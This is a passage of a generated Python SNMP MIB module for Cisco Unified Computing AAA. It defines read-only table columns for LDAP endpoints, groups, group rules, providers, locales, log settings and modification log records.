cucsAaaLdapEpRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpRn.setStatus('current')
cucsAaaLdapEpAttribute = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpAttribute.setStatus('current')
cucsAaaLdapEpBasedn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpBasedn.setStatus('current')
cucsAaaLdapEpDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpDescr.setStatus('current')
cucsAaaLdapEpFilter = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFilter.setStatus('current')
cucsAaaLdapEpFsmDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmDescr.setStatus('current')
cucsAaaLdapEpFsmPrev = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmPrev.setStatus('current')
cucsAaaLdapEpFsmProgr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 10), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmProgr.setStatus('current')
cucsAaaLdapEpFsmRmtInvErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 11), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtInvErrCode.setStatus('current')
cucsAaaLdapEpFsmRmtInvErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 12), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtInvErrDescr.setStatus('current')
cucsAaaLdapEpFsmRmtInvRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 13), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtInvRslt.setStatus('current')
cucsAaaLdapEpFsmStageDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 14), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageDescr.setStatus('current')
cucsAaaLdapEpFsmStamp = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 15), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStamp.setStatus('current')
cucsAaaLdapEpFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 16), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStatus.setStatus('current')
cucsAaaLdapEpFsmTry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 17), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmTry.setStatus('current')
cucsAaaLdapEpIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 18), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpIntId.setStatus('current')
cucsAaaLdapEpName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 19), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpName.setStatus('current')
cucsAaaLdapEpRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 20), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpRetries.setStatus('current')
cucsAaaLdapEpTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 21), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpTimeout.setStatus('current')
cucsAaaLdapEpPolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 22), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpPolicyLevel.setStatus('current')
cucsAaaLdapEpPolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 11, 1, 23), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpPolicyOwner.setStatus('current')
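# cucsAaaLdapEpFsmTable (1.3.6.1.4.1.9.9.719.1.2.45): FSM status for the LDAP endpoint.
# As with the other cucsAaa tables below, rows are indexed by a CucsManagedObjectId
# instance id and carry read-only Dn/Rn columns for the managed object.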
cucsAaaLdapEpFsmTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45), )
if mibBuilder.loadTexts: cucsAaaLdapEpFsmTable.setStatus('current')
cucsAaaLdapEpFsmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapEpFsmInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapEpFsmEntry.setStatus('current')
cucsAaaLdapEpFsmInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapEpFsmInstanceId.setStatus('current')
cucsAaaLdapEpFsmDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmDn.setStatus('current')
cucsAaaLdapEpFsmRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRn.setStatus('current')
cucsAaaLdapEpFsmCompletionTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 4), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmCompletionTime.setStatus('current')
cucsAaaLdapEpFsmCurrentFsm = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 5), CucsAaaLdapEpFsmCurrentFsm()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmCurrentFsm.setStatus('current')
cucsAaaLdapEpFsmDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmDescrData.setStatus('current')
cucsAaaLdapEpFsmFsmStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 7), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmFsmStatus.setStatus('current')
cucsAaaLdapEpFsmProgress = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmProgress.setStatus('current')
cucsAaaLdapEpFsmRmtErrCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtErrCode.setStatus('current')
cucsAaaLdapEpFsmRmtErrDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 10), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtErrDescr.setStatus('current')
cucsAaaLdapEpFsmRmtRslt = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 45, 1, 11), CucsConditionRemoteInvRslt()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmRmtRslt.setStatus('current')
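# cucsAaaLdapEpFsmStageTable (1.3.6.1.4.1.9.9.719.1.2.46): per-stage FSM detail (name, order, retry, status).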
cucsAaaLdapEpFsmStageTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46), )
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageTable.setStatus('current')
cucsAaaLdapEpFsmStageEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapEpFsmStageInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageEntry.setStatus('current')
cucsAaaLdapEpFsmStageInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageInstanceId.setStatus('current')
cucsAaaLdapEpFsmStageDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageDn.setStatus('current')
cucsAaaLdapEpFsmStageRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageRn.setStatus('current')
cucsAaaLdapEpFsmStageDescrData = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageDescrData.setStatus('current')
cucsAaaLdapEpFsmStageLastUpdateTime = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 5), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageLastUpdateTime.setStatus('current')
cucsAaaLdapEpFsmStageName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 6), CucsAaaLdapEpFsmStageName()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageName.setStatus('current')
cucsAaaLdapEpFsmStageOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 7), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageOrder.setStatus('current')
cucsAaaLdapEpFsmStageRetry = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 8), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageRetry.setStatus('current')
cucsAaaLdapEpFsmStageStageStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 46, 1, 9), CucsFsmFsmStageStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapEpFsmStageStageStatus.setStatus('current')
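# cucsAaaLdapGroupTable (1.3.6.1.4.1.9.9.719.1.2.12): LDAP group objects.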
cucsAaaLdapGroupTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12), )
if mibBuilder.loadTexts: cucsAaaLdapGroupTable.setStatus('current')
cucsAaaLdapGroupEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapGroupInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapGroupEntry.setStatus('current')
cucsAaaLdapGroupInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapGroupInstanceId.setStatus('current')
cucsAaaLdapGroupDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupDn.setStatus('current')
cucsAaaLdapGroupRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRn.setStatus('current')
cucsAaaLdapGroupDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupDescr.setStatus('current')
cucsAaaLdapGroupName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 12, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupName.setStatus('current')
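# cucsAaaLdapGroupRuleTable (1.3.6.1.4.1.9.9.719.1.2.13): LDAP group authorization rules (target attribute, traversal, primary-group usage).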
cucsAaaLdapGroupRuleTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13), )
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleTable.setStatus('current')
cucsAaaLdapGroupRuleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapGroupRuleInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleEntry.setStatus('current')
cucsAaaLdapGroupRuleInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleInstanceId.setStatus('current')
cucsAaaLdapGroupRuleDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleDn.setStatus('current')
cucsAaaLdapGroupRuleRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleRn.setStatus('current')
cucsAaaLdapGroupRuleAuthorization = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 4), CucsAaaLdapGroupRuleAuthorization()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleAuthorization.setStatus('current')
cucsAaaLdapGroupRuleDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleDescr.setStatus('current')
cucsAaaLdapGroupRuleName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 7), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleName.setStatus('current')
cucsAaaLdapGroupRuleTargetAttr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleTargetAttr.setStatus('current')
cucsAaaLdapGroupRuleTraversal = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 9), CucsAaaLdapGroupRuleTraversal()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleTraversal.setStatus('current')
cucsAaaLdapGroupRuleUsePrimaryGroup = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 13, 1, 10), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapGroupRuleUsePrimaryGroup.setStatus('current')
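# cucsAaaLdapProviderTable (1.3.6.1.4.1.9.9.719.1.2.14): per-server LDAP provider settings (base DN, filter, SSL, port, retries, timeout, vendor).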
cucsAaaLdapProviderTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14), )
if mibBuilder.loadTexts: cucsAaaLdapProviderTable.setStatus('current')
cucsAaaLdapProviderEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLdapProviderInstanceId"))
if mibBuilder.loadTexts: cucsAaaLdapProviderEntry.setStatus('current')
cucsAaaLdapProviderInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLdapProviderInstanceId.setStatus('current')
cucsAaaLdapProviderDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderDn.setStatus('current')
cucsAaaLdapProviderRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderRn.setStatus('current')
cucsAaaLdapProviderAttribute = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderAttribute.setStatus('current')
cucsAaaLdapProviderBasedn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderBasedn.setStatus('current')
cucsAaaLdapProviderDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderDescr.setStatus('current')
cucsAaaLdapProviderEnableSSL = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 7), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderEnableSSL.setStatus('current')
cucsAaaLdapProviderEncKey = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderEncKey.setStatus('current')
cucsAaaLdapProviderFilter = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 9), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderFilter.setStatus('current')
cucsAaaLdapProviderKey = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 11), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderKey.setStatus('current')
cucsAaaLdapProviderKeySet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 12), TruthValue()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderKeySet.setStatus('current')
cucsAaaLdapProviderName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 13), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderName.setStatus('current')
cucsAaaLdapProviderOrder = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 14), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderOrder.setStatus('current')
cucsAaaLdapProviderPort = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 15), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderPort.setStatus('current')
cucsAaaLdapProviderRetries = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 16), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderRetries.setStatus('current')
cucsAaaLdapProviderRootdn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 17), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderRootdn.setStatus('current')
cucsAaaLdapProviderTimeout = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 18), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderTimeout.setStatus('current')
cucsAaaLdapProviderVendor = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 14, 1, 19), CucsAaaLdapVendor()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLdapProviderVendor.setStatus('current')
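# cucsAaaLocaleTable (1.3.6.1.4.1.9.9.719.1.2.15): AAA locale objects with config state and policy ownership.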
cucsAaaLocaleTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15), )
if mibBuilder.loadTexts: cucsAaaLocaleTable.setStatus('current')
cucsAaaLocaleEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLocaleInstanceId"))
if mibBuilder.loadTexts: cucsAaaLocaleEntry.setStatus('current')
cucsAaaLocaleInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLocaleInstanceId.setStatus('current')
cucsAaaLocaleDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleDn.setStatus('current')
cucsAaaLocaleRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleRn.setStatus('current')
cucsAaaLocaleDescr = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleDescr.setStatus('current')
cucsAaaLocaleIntId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 5), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleIntId.setStatus('current')
cucsAaaLocaleName = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleName.setStatus('current')
cucsAaaLocaleConfigState = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 7), CucsAaaConfigState()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleConfigState.setStatus('current')
cucsAaaLocaleConfigStatusMessage = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 8), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocaleConfigStatusMessage.setStatus('current')
cucsAaaLocalePolicyLevel = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 9), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocalePolicyLevel.setStatus('current')
cucsAaaLocalePolicyOwner = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 15, 1, 10), CucsPolicyPolicyOwner()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLocalePolicyOwner.setStatus('current')
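# cucsAaaLogTable (1.3.6.1.4.1.9.9.719.1.2.16): AAA log sizing and purge-window settings.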
cucsAaaLogTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16), )
if mibBuilder.loadTexts: cucsAaaLogTable.setStatus('current')
cucsAaaLogEntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaLogInstanceId"))
if mibBuilder.loadTexts: cucsAaaLogEntry.setStatus('current')
cucsAaaLogInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaLogInstanceId.setStatus('current')
cucsAaaLogDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLogDn.setStatus('current')
cucsAaaLogRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLogRn.setStatus('current')
cucsAaaLogMaxSize = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 4), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLogMaxSize.setStatus('current')
cucsAaaLogPurgeWindow = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 5), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLogPurgeWindow.setStatus('current')
cucsAaaLogSize = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 16, 1, 6), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaLogSize.setStatus('current')
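# cucsAaaModLRTable (1.3.6.1.4.1.9.9.719.1.2.17): modification log records; the column names
# suggest an audit trail of configuration changes (affected DN, change set, user, session).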
cucsAaaModLRTable = MibTable((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17), )
if mibBuilder.loadTexts: cucsAaaModLRTable.setStatus('current')
cucsAaaModLREntry = MibTableRow((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1), ).setIndexNames((0, "CISCO-UNIFIED-COMPUTING-AAA-MIB", "cucsAaaModLRInstanceId"))
if mibBuilder.loadTexts: cucsAaaModLREntry.setStatus('current')
cucsAaaModLRInstanceId = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 1), CucsManagedObjectId())
if mibBuilder.loadTexts: cucsAaaModLRInstanceId.setStatus('current')
cucsAaaModLRDn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 2), CucsManagedObjectDn()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRDn.setStatus('current')
cucsAaaModLRRn = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 3), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRRn.setStatus('current')
cucsAaaModLRAffected = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 4), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRAffected.setStatus('current')
cucsAaaModLRCause = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 5), CucsConditionCause()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRCause.setStatus('current')
cucsAaaModLRChangeSet = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 6), SnmpAdminString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRChangeSet.setStatus('current')
cucsAaaModLRCode = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 7), CucsConditionCode()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRCode.setStatus('current')
cucsAaaModLRCreated = MibTableColumn((1, 3, 6, 1, 4, 1, 9, 9, 719, 1, 2, 17, 1, 8), DateAndTime()).setMaxAccess("readonly")
if mibBuilder.loadTexts: cucsAaaModLRCreated.setStatus('current')
